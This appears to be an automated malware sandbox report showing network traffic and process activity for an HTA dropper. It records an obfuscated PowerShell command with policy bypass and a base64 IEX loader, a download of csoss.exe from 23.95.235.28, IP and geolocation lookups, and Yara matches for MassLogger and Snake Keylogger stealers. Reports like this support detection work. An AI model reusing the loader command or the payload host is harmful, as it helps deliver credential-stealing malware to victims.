                                                                                  Mar 17, 2025 01:19:06.503074884 CET804969523.95.235.28192.168.2.6
                                                                                  Mar 17, 2025 01:19:06.503096104 CET804969523.95.235.28192.168.2.6
                                                                                  Mar 17, 2025 01:19:06.503096104 CET4969580192.168.2.623.95.235.28
                                                                                  Mar 17, 2025 01:19:06.503108025 CET804969523.95.235.28192.168.2.6
                                                                                  Mar 17, 2025 01:19:06.503118992 CET804969523.95.235.28192.168.2.6
                                                                                  Mar 17, 2025 01:19:06.503129959 CET4969580192.168.2.623.95.235.28
                                                                                  Mar 17, 2025 01:19:06.503132105 CET804969523.95.235.28192.168.2.6
                                                                                  Mar 17, 2025 01:19:06.503144979 CET804969523.95.235.28192.168.2.6
                                                                                  Mar 17, 2025 01:19:06.503151894 CET4969580192.168.2.623.95.235.28
                                                                                  Mar 17, 2025 01:19:06.503160954 CET804969523.95.235.28192.168.2.6
                                                                                  Mar 17, 2025 01:19:06.503175974 CET4969580192.168.2.623.95.235.28
                                                                                  Mar 17, 2025 01:19:06.503177881 CET804969523.95.235.28192.168.2.6
                                                                                  Mar 17, 2025 01:19:06.503190041 CET804969523.95.235.28192.168.2.6
                                                                                  Mar 17, 2025 01:19:06.503195047 CET4969580192.168.2.623.95.235.28
                                                                                  Mar 17, 2025 01:19:06.503202915 CET804969523.95.235.28192.168.2.6
                                                                                  Mar 17, 2025 01:19:06.503223896 CET4969580192.168.2.623.95.235.28
                                                                                  Mar 17, 2025 01:19:06.503252983 CET804969523.95.235.28192.168.2.6
                                                                                  Mar 17, 2025 01:19:06.503261089 CET4969580192.168.2.623.95.235.28
                                                                                  Mar 17, 2025 01:19:06.503264904 CET804969523.95.235.28192.168.2.6
                                                                                  Mar 17, 2025 01:19:06.503278017 CET804969523.95.235.28192.168.2.6
                                                                                  Mar 17, 2025 01:19:06.503292084 CET804969523.95.235.28192.168.2.6
                                                                                  Mar 17, 2025 01:19:06.503295898 CET4969580192.168.2.623.95.235.28
                                                                                  Mar 17, 2025 01:19:06.503320932 CET4969580192.168.2.623.95.235.28
                                                                                  Mar 17, 2025 01:19:06.503330946 CET804969523.95.235.28192.168.2.6
                                                                                  Mar 17, 2025 01:19:06.503341913 CET804969523.95.235.28192.168.2.6
                                                                                  Mar 17, 2025 01:19:06.503350019 CET4969580192.168.2.623.95.235.28
                                                                                  Mar 17, 2025 01:19:06.503355026 CET804969523.95.235.28192.168.2.6
                                                                                  Mar 17, 2025 01:19:06.503366947 CET804969523.95.235.28192.168.2.6
                                                                                  Mar 17, 2025 01:19:06.503371000 CET4969580192.168.2.623.95.235.28
                                                                                  Mar 17, 2025 01:19:06.503386974 CET804969523.95.235.28192.168.2.6
                                                                                  Mar 17, 2025 01:19:06.503393888 CET4969580192.168.2.623.95.235.28
                                                                                  Mar 17, 2025 01:19:06.503401041 CET804969523.95.235.28192.168.2.6
                                                                                  Mar 17, 2025 01:19:06.503406048 CET4969580192.168.2.623.95.235.28
                                                                                  Mar 17, 2025 01:19:06.503442049 CET4969580192.168.2.623.95.235.28
                                                                                  Mar 17, 2025 01:19:06.503447056 CET804969523.95.235.28192.168.2.6
                                                                                  Mar 17, 2025 01:19:06.503458977 CET804969523.95.235.28192.168.2.6
                                                                                  Mar 17, 2025 01:19:06.503487110 CET4969580192.168.2.623.95.235.28
                                                                                  Mar 17, 2025 01:19:06.503509998 CET4969580192.168.2.623.95.235.28
                                                                                  Mar 17, 2025 01:19:06.503510952 CET804969523.95.235.28192.168.2.6
                                                                                  Mar 17, 2025 01:19:06.503525972 CET804969523.95.235.28192.168.2.6
                                                                                  Mar 17, 2025 01:19:06.503541946 CET804969523.95.235.28192.168.2.6
                                                                                  Mar 17, 2025 01:19:06.503556013 CET804969523.95.235.28192.168.2.6
                                                                                  Mar 17, 2025 01:19:06.503566980 CET804969523.95.235.28192.168.2.6
                                                                                  Mar 17, 2025 01:19:06.503571987 CET4969580192.168.2.623.95.235.28
                                                                                  Mar 17, 2025 01:19:06.503581047 CET804969523.95.235.28192.168.2.6
                                                                                  Mar 17, 2025 01:19:06.503601074 CET4969580192.168.2.623.95.235.28
                                                                                  Mar 17, 2025 01:19:06.503618956 CET804969523.95.235.28192.168.2.6
                                                                                  Mar 17, 2025 01:19:06.503619909 CET4969580192.168.2.623.95.235.28
                                                                                  Mar 17, 2025 01:19:06.503632069 CET804969523.95.235.28192.168.2.6
                                                                                  Mar 17, 2025 01:19:06.503644943 CET804969523.95.235.28192.168.2.6
                                                                                  Mar 17, 2025 01:19:06.503658056 CET804969523.95.235.28192.168.2.6
                                                                                  Mar 17, 2025 01:19:06.503669024 CET804969523.95.235.28192.168.2.6
                                                                                  Mar 17, 2025 01:19:06.503675938 CET4969580192.168.2.623.95.235.28
                                                                                  Mar 17, 2025 01:19:06.503696918 CET4969580192.168.2.623.95.235.28
                                                                                  Mar 17, 2025 01:19:06.503715038 CET4969580192.168.2.623.95.235.28
                                                                                  Mar 17, 2025 01:19:06.503722906 CET804969523.95.235.28192.168.2.6
                                                                                  Mar 17, 2025 01:19:06.503735065 CET804969523.95.235.28192.168.2.6
                                                                                  Mar 17, 2025 01:19:06.503750086 CET804969523.95.235.28192.168.2.6
                                                                                  Mar 17, 2025 01:19:06.503767967 CET804969523.95.235.28192.168.2.6
                                                                                  Mar 17, 2025 01:19:06.503778934 CET804969523.95.235.28192.168.2.6
                                                                                  Mar 17, 2025 01:19:06.503779888 CET4969580192.168.2.623.95.235.28
                                                                                  Mar 17, 2025 01:19:06.503803015 CET4969580192.168.2.623.95.235.28
                                                                                  Mar 17, 2025 01:19:06.503829002 CET804969523.95.235.28192.168.2.6
                                                                                  Mar 17, 2025 01:19:06.503834963 CET4969580192.168.2.623.95.235.28
                                                                                  Mar 17, 2025 01:19:06.503848076 CET804969523.95.235.28192.168.2.6
                                                                                  Mar 17, 2025 01:19:06.503859997 CET804969523.95.235.28192.168.2.6
                                                                                  Mar 17, 2025 01:19:06.503873110 CET804969523.95.235.28192.168.2.6
                                                                                  Mar 17, 2025 01:19:06.503874063 CET4969580192.168.2.623.95.235.28
                                                                                  Mar 17, 2025 01:19:06.503882885 CET804969523.95.235.28192.168.2.6
                                                                                  Mar 17, 2025 01:19:06.503895044 CET804969523.95.235.28192.168.2.6
                                                                                  Mar 17, 2025 01:19:06.503906012 CET4969580192.168.2.623.95.235.28
                                                                                  Mar 17, 2025 01:19:06.503937006 CET4969580192.168.2.623.95.235.28
                                                                                  Mar 17, 2025 01:19:06.503947973 CET804969523.95.235.28192.168.2.6
                                                                                  Mar 17, 2025 01:19:06.503958941 CET804969523.95.235.28192.168.2.6
                                                                                  Mar 17, 2025 01:19:06.503971100 CET804969523.95.235.28192.168.2.6
                                                                                  Mar 17, 2025 01:19:06.503987074 CET4969580192.168.2.623.95.235.28
                                                                                  Mar 17, 2025 01:19:06.503988981 CET804969523.95.235.28192.168.2.6
                                                                                  Mar 17, 2025 01:19:06.504029989 CET4969580192.168.2.623.95.235.28
                                                                                  Mar 17, 2025 01:19:06.504081011 CET804969523.95.235.28192.168.2.6
                                                                                  Mar 17, 2025 01:19:06.504092932 CET804969523.95.235.28192.168.2.6
                                                                                  Mar 17, 2025 01:19:06.504103899 CET804969523.95.235.28192.168.2.6
                                                                                  Mar 17, 2025 01:19:06.504105091 CET4969580192.168.2.623.95.235.28
                                                                                  Mar 17, 2025 01:19:06.504116058 CET804969523.95.235.28192.168.2.6
                                                                                  Mar 17, 2025 01:19:06.504136086 CET4969580192.168.2.623.95.235.28
                                                                                  Mar 17, 2025 01:19:06.504164934 CET4969580192.168.2.623.95.235.28
                                                                                  Mar 17, 2025 01:19:06.504194975 CET804969523.95.235.28192.168.2.6
                                                                                  Mar 17, 2025 01:19:06.504206896 CET804969523.95.235.28192.168.2.6
                                                                                  Mar 17, 2025 01:19:06.504219055 CET804969523.95.235.28192.168.2.6
                                                                                  Mar 17, 2025 01:19:06.504230022 CET804969523.95.235.28192.168.2.6
                                                                                  Mar 17, 2025 01:19:06.504235983 CET4969580192.168.2.623.95.235.28
                                                                                  Mar 17, 2025 01:19:06.504245043 CET804969523.95.235.28192.168.2.6
                                                                                  Mar 17, 2025 01:19:06.504264116 CET804969523.95.235.28192.168.2.6
                                                                                  Mar 17, 2025 01:19:06.504276991 CET804969523.95.235.28192.168.2.6
                                                                                  Mar 17, 2025 01:19:06.504290104 CET4969580192.168.2.623.95.235.28
                                                                                  Mar 17, 2025 01:19:06.504291058 CET804969523.95.235.28192.168.2.6
                                                                                  Mar 17, 2025 01:19:06.504317045 CET804969523.95.235.28192.168.2.6
                                                                                  Mar 17, 2025 01:19:06.504327059 CET804969523.95.235.28192.168.2.6
                                                                                  Mar 17, 2025 01:19:06.504338980 CET804969523.95.235.28192.168.2.6
                                                                                  Mar 17, 2025 01:19:06.504344940 CET4969580192.168.2.623.95.235.28
                                                                                  Mar 17, 2025 01:19:06.504344940 CET4969580192.168.2.623.95.235.28
                                                                                  Mar 17, 2025 01:19:06.504350901 CET804969523.95.235.28192.168.2.6
                                                                                  Mar 17, 2025 01:19:06.504363060 CET804969523.95.235.28192.168.2.6
                                                                                  Mar 17, 2025 01:19:06.504374027 CET804969523.95.235.28192.168.2.6
                                                                                  Mar 17, 2025 01:19:06.504375935 CET4969580192.168.2.623.95.235.28
                                                                                  Mar 17, 2025 01:19:06.504390001 CET804969523.95.235.28192.168.2.6
                                                                                  Mar 17, 2025 01:19:06.504400969 CET4969580192.168.2.623.95.235.28
                                                                                  Mar 17, 2025 01:19:06.504420996 CET4969580192.168.2.623.95.235.28
                                                                                  Mar 17, 2025 01:19:06.504446983 CET4969580192.168.2.623.95.235.28
                                                                                  Mar 17, 2025 01:19:06.504462957 CET804969523.95.235.28192.168.2.6
                                                                                  Mar 17, 2025 01:19:06.504475117 CET804969523.95.235.28192.168.2.6
                                                                                  Mar 17, 2025 01:19:06.504486084 CET804969523.95.235.28192.168.2.6
                                                                                  Mar 17, 2025 01:19:06.504497051 CET804969523.95.235.28192.168.2.6
                                                                                  Mar 17, 2025 01:19:06.504503012 CET4969580192.168.2.623.95.235.28
                                                                                  Mar 17, 2025 01:19:06.504508018 CET804969523.95.235.28192.168.2.6
                                                                                  Mar 17, 2025 01:19:06.504518986 CET804969523.95.235.28192.168.2.6
                                                                                  Mar 17, 2025 01:19:06.504522085 CET4969580192.168.2.623.95.235.28
                                                                                  Mar 17, 2025 01:19:06.504532099 CET804969523.95.235.28192.168.2.6
                                                                                  Mar 17, 2025 01:19:06.504544973 CET4969580192.168.2.623.95.235.28
                                                                                  Mar 17, 2025 01:19:06.504575014 CET804969523.95.235.28192.168.2.6
                                                                                  Mar 17, 2025 01:19:06.504579067 CET4969580192.168.2.623.95.235.28
                                                                                  Mar 17, 2025 01:19:06.504585981 CET804969523.95.235.28192.168.2.6
                                                                                  Mar 17, 2025 01:19:06.504597902 CET804969523.95.235.28192.168.2.6
                                                                                  Mar 17, 2025 01:19:06.504611969 CET804969523.95.235.28192.168.2.6
                                                                                  Mar 17, 2025 01:19:06.504615068 CET4969580192.168.2.623.95.235.28
                                                                                  Mar 17, 2025 01:19:06.504623890 CET804969523.95.235.28192.168.2.6
                                                                                  Mar 17, 2025 01:19:06.504642963 CET804969523.95.235.28192.168.2.6
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Mar 17, 2025 01:19:11.569528103 CET | 55497 | 53 | 192.168.2.6 | 1.1.1.1
Mar 17, 2025 01:19:11.578458071 CET | 53 | 55497 | 1.1.1.1 | 192.168.2.6
Mar 17, 2025 01:19:12.628690004 CET | 61022 | 53 | 192.168.2.6 | 1.1.1.1
Mar 17, 2025 01:19:12.637061119 CET | 53 | 61022 | 1.1.1.1 | 192.168.2.6
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Mar 17, 2025 01:19:11.569528103 CET | 192.168.2.6 | 1.1.1.1 | 0xe13d | Standard query (0) | checkip.dyndns.org | A (IP address) | IN (0x0001) | false
Mar 17, 2025 01:19:12.628690004 CET | 192.168.2.6 | 1.1.1.1 | 0x7f9f | Standard query (0) | reallyfreegeoip.org | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Mar 17, 2025 01:19:11.578458071 CET | 1.1.1.1 | 192.168.2.6 | 0xe13d | No error (0) | checkip.dyndns.org | checkip.dyndns.com | - | CNAME (Canonical name) | IN (0x0001) | false
Mar 17, 2025 01:19:11.578458071 CET | 1.1.1.1 | 192.168.2.6 | 0xe13d | No error (0) | checkip.dyndns.com | - | 158.101.44.242 | A (IP address) | IN (0x0001) | false
Mar 17, 2025 01:19:11.578458071 CET | 1.1.1.1 | 192.168.2.6 | 0xe13d | No error (0) | checkip.dyndns.com | - | 193.122.130.0 | A (IP address) | IN (0x0001) | false
Mar 17, 2025 01:19:11.578458071 CET | 1.1.1.1 | 192.168.2.6 | 0xe13d | No error (0) | checkip.dyndns.com | - | 193.122.6.168 | A (IP address) | IN (0x0001) | false
Mar 17, 2025 01:19:11.578458071 CET | 1.1.1.1 | 192.168.2.6 | 0xe13d | No error (0) | checkip.dyndns.com | - | 132.226.247.73 | A (IP address) | IN (0x0001) | false
Mar 17, 2025 01:19:11.578458071 CET | 1.1.1.1 | 192.168.2.6 | 0xe13d | No error (0) | checkip.dyndns.com | - | 132.226.8.169 | A (IP address) | IN (0x0001) | false
Mar 17, 2025 01:19:12.637061119 CET | 1.1.1.1 | 192.168.2.6 | 0x7f9f | No error (0) | reallyfreegeoip.org | - | 104.21.48.1 | A (IP address) | IN (0x0001) | false
Mar 17, 2025 01:19:12.637061119 CET | 1.1.1.1 | 192.168.2.6 | 0x7f9f | No error (0) | reallyfreegeoip.org | - | 104.21.64.1 | A (IP address) | IN (0x0001) | false
Mar 17, 2025 01:19:12.637061119 CET | 1.1.1.1 | 192.168.2.6 | 0x7f9f | No error (0) | reallyfreegeoip.org | - | 104.21.112.1 | A (IP address) | IN (0x0001) | false
Mar 17, 2025 01:19:12.637061119 CET | 1.1.1.1 | 192.168.2.6 | 0x7f9f | No error (0) | reallyfreegeoip.org | - | 104.21.80.1 | A (IP address) | IN (0x0001) | false
Mar 17, 2025 01:19:12.637061119 CET | 1.1.1.1 | 192.168.2.6 | 0x7f9f | No error (0) | reallyfreegeoip.org | - | 104.21.32.1 | A (IP address) | IN (0x0001) | false
Mar 17, 2025 01:19:12.637061119 CET | 1.1.1.1 | 192.168.2.6 | 0x7f9f | No error (0) | reallyfreegeoip.org | - | 104.21.96.1 | A (IP address) | IN (0x0001) | false
Mar 17, 2025 01:19:12.637061119 CET | 1.1.1.1 | 192.168.2.6 | 0x7f9f | No error (0) | reallyfreegeoip.org | - | 104.21.16.1 | A (IP address) | IN (0x0001) | false
                                                                                  • reallyfreegeoip.org
                                                                                  • 23.95.235.28
                                                                                  • checkip.dyndns.org
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.6 | 49695 | 23.95.235.28 | 80 | 5308 | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Timestamp | Bytes transferred | Direction | Data
Mar 17, 2025 01:19:05.211270094 CET | 285 | OUT | GET /120/csoss.exe HTTP/1.1
                                                                                  Accept: */*
                                                                                  Accept-Encoding: gzip, deflate
                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                                                                  Host: 23.95.235.28
                                                                                  Connection: Keep-Alive
Mar 17, 2025 01:19:05.706269026 CET | 1236 | IN | HTTP/1.1 200 OK
                                                                                  Date: Mon, 17 Mar 2025 00:19:04 GMT
                                                                                  Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                  Last-Modified: Thu, 13 Mar 2025 12:29:25 GMT
                                                                                  ETag: "ef800-6303878f4d6d6"
                                                                                  Accept-Ranges: bytes
                                                                                  Content-Length: 980992
                                                                                  Keep-Alive: timeout=5, max=100
                                                                                  Connection: Keep-Alive
                                                                                  Content-Type: application/x-msdownload


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.6 | 49696 | 158.101.44.242 | 80 | 5484 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
Timestamp | Bytes transferred | Direction | Data
Mar 17, 2025 01:19:11.590915918 CET | 151 | OUT | GET / HTTP/1.1
                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                  Host: checkip.dyndns.org
                                                                                  Connection: Keep-Alive
Mar 17, 2025 01:19:12.189285040 CET | 321 | IN | HTTP/1.1 200 OK
                                                                                  Date: Mon, 17 Mar 2025 00:19:12 GMT
                                                                                  Content-Type: text/html
                                                                                  Content-Length: 104
                                                                                  Connection: keep-alive
                                                                                  Cache-Control: no-cache
                                                                                  Pragma: no-cache
                                                                                  X-Request-ID: 94931f85050f398876f1bad94c2a121b
                                                                                  Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>
Mar 17, 2025 01:19:12.206897974 CET | 127 | OUT | GET / HTTP/1.1
                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                  Host: checkip.dyndns.org
Mar 17, 2025 01:19:12.383248091 CET | 321 | IN | HTTP/1.1 200 OK
                                                                                  Date: Mon, 17 Mar 2025 00:19:12 GMT
                                                                                  Content-Type: text/html
                                                                                  Content-Length: 104
                                                                                  Connection: keep-alive
                                                                                  Cache-Control: no-cache
                                                                                  Pragma: no-cache
                                                                                  X-Request-ID: 6a36991c3ed2dde0375a8a7b4549c8c9
                                                                                  Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.6 | 49697 | 104.21.48.1 | 443 | 5484 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
Timestamp | Bytes transferred | Direction | Data
2025-03-17 00:19:13 UTC | 85 | OUT | GET /xml/8.46.123.189 HTTP/1.1
                                                                                  Host: reallyfreegeoip.org
                                                                                  Connection: Keep-Alive
2025-03-17 00:19:13 UTC | 861 | IN | HTTP/1.1 200 OK
                                                                                  Date: Mon, 17 Mar 2025 00:19:13 GMT
                                                                                  Content-Type: text/xml
                                                                                  Content-Length: 362
                                                                                  Connection: close
                                                                                  Cf-Ray: 921851484ef25f83-EWR
                                                                                  Server: cloudflare
                                                                                  Age: 21780
                                                                                  Cache-Control: max-age=31536000
                                                                                  Cf-Cache-Status: HIT
                                                                                  Last-Modified: Sun, 16 Mar 2025 18:16:12 GMT
                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Af%2Fnd9oUKA48%2FwNjBGFdTmqVmzUOenGnXUjga9%2BxqqIkxDRdZQoZDZRX30IKRGOqcUspYqIGooRy%2B7hv%2Fsba5XGBkTrR0QDJvXqSMcmjDqmUA9qNxPSi9s%2F%2Bik5tjHuBrg6dcuqH"}],"group":"cf-nel","max_age":604800}
                                                                                  Nel: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=2052&min_rtt=2052&rtt_var=771&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2849&recv_bytes=699&delivery_rate=1418853&cwnd=131&unsent_bytes=0&cid=47c76c35a9d42d39&ts=275&x=0"
2025-03-17 00:19:13 UTC | 362 | IN | Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
    Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo



Target ID: 0
Start time: 20:18:59
Start date: 16/03/2025
Path: C:\Windows\SysWOW64\mshta.exe
Wow64 process (32bit): true
Commandline: mshta.exe "C:\Users\user\Desktop\needagoodplanforsuccesstogetbackbest.hta"
Imagebase: 0x970000
File size: 13'312 bytes
MD5 hash: 06B02D5C097C7DB1F109749C45F3F505
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: false

Target ID: 1
Start time: 20:19:00
Start date: 16/03/2025
Path: C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit): true
Commandline: "C:\Windows\system32\cmd.exe" "/C POwErsHeLl.exe -eX bYPasS -NOP -w 1 -C DEVICEcrEDeNtIaLDePLoyMEnt ; iEx($(IEX('[SYstEM.TEXT.encOdInG]'+[ChaR]0x3a+[CHAR]0X3A+'UtF8.geTsTRinG([SyStEm.ConVert]'+[cHAr]0x3a+[ChaR]58+'frOmBAsE64striNg('+[CHar]34+'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'+[cHar]0x22+'))')))"
Imagebase: 0x2a0000
File size: 236'544 bytes
MD5 hash: D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

Target ID: 2
Start time: 20:19:00
Start date: 16/03/2025
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff68dae0000
File size: 862'208 bytes
MD5 hash: 0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

Target ID: 3
Start time: 20:19:00
Start date: 16/03/2025
Path: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit): true
Commandline: POwErsHeLl.exe -eX bYPasS -NOP -w 1 -C DEVICEcrEDeNtIaLDePLoyMEnt ; iEx($(IEX('[SYstEM.TEXT.encOdInG]'+[ChaR]0x3a+[CHAR]0X3A+'UtF8.geTsTRinG([SyStEm.ConVert]'+[cHAr]0x3a+[ChaR]58+'frOmBAsE64striNg('+[CHar]34+'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'+[cHar]0x22+'))')))"
Imagebase: 0xf20000
File size: 433'152 bytes
MD5 hash: C32CA4ACFCC635EC1EA6ED8A34DF5FAC
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

Target ID: 4
Start time: 20:19:03
Start date: 16/03/2025
Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
Wow64 process (32bit): true
Commandline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\43swuu3x\43swuu3x.cmdline"
Imagebase: 0x800000
File size: 2'141'552 bytes
MD5 hash: EB80BB1CA9B9C7F516FF69AFCFD75B7D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

Target ID: 5
Start time: 20:19:04
Start date: 16/03/2025
Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
Wow64 process (32bit): true
Commandline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESC5CF.tmp" "c:\Users\user\AppData\Local\Temp\43swuu3x\CSC1706E7A7601C443B9125CD5A3AB1B1B7.TMP"
Imagebase: 0x440000
File size: 46'832 bytes
MD5 hash: 70D838A7DC5B359C3F938A71FAD77DB0
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

Target ID: 6
Start time: 20:19:09
Start date: 16/03/2025
Path: C:\Users\user\AppData\Roaming\csoss.exe
Wow64 process (32bit): true
Commandline: "C:\Users\user\AppData\Roaming\csoss.exe"
Imagebase: 0xd00000
File size: 980'992 bytes
MD5 hash: 54DE0C8E192E7BC71B6D284FFF136296
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Yara matches:
• Rule: JoeSecurity_MassLogger, Description: Yara detected MassLogger RAT, Source: 00000006.00000002.1398840168.0000000000EB0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000006.00000002.1398840168.0000000000EB0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_MSILLogger, Description: Yara detected MSIL Logger, Source: 00000006.00000002.1398840168.0000000000EB0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000006.00000002.1398840168.0000000000EB0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
• Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000006.00000002.1398840168.0000000000EB0000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
• Rule: MAL_Envrial_Jan18_1, Description: Detects Encrial credential stealer malware, Source: 00000006.00000002.1398840168.0000000000EB0000.00000004.00001000.00020000.00000000.sdmp, Author: Florian Roth
Antivirus matches:
• Detection: 100%, Avira
• Detection: 83%, ReversingLabs
Reputation: low
Has exited: true

Target ID: 7
Start time: 20:19:10
Start date: 16/03/2025
Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
Wow64 process (32bit): true
Commandline: "C:\Users\user\AppData\Roaming\csoss.exe"
Imagebase: 0x150000
File size: 45'984 bytes
MD5 hash: 9D352BC46709F0CB5EC974633A0C3C94
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Yara matches:
• Rule: JoeSecurity_MassLogger, Description: Yara detected MassLogger RAT, Source: 00000007.00000002.2507916337.0000000000522000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000007.00000002.2507916337.0000000000522000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_MSILLogger, Description: Yara detected MSIL Logger, Source: 00000007.00000002.2507916337.0000000000522000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000007.00000002.2507916337.0000000000522000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
• Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000007.00000002.2507916337.0000000000522000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
• Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000007.00000002.2509390080.0000000002646000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation: high
Has exited: false
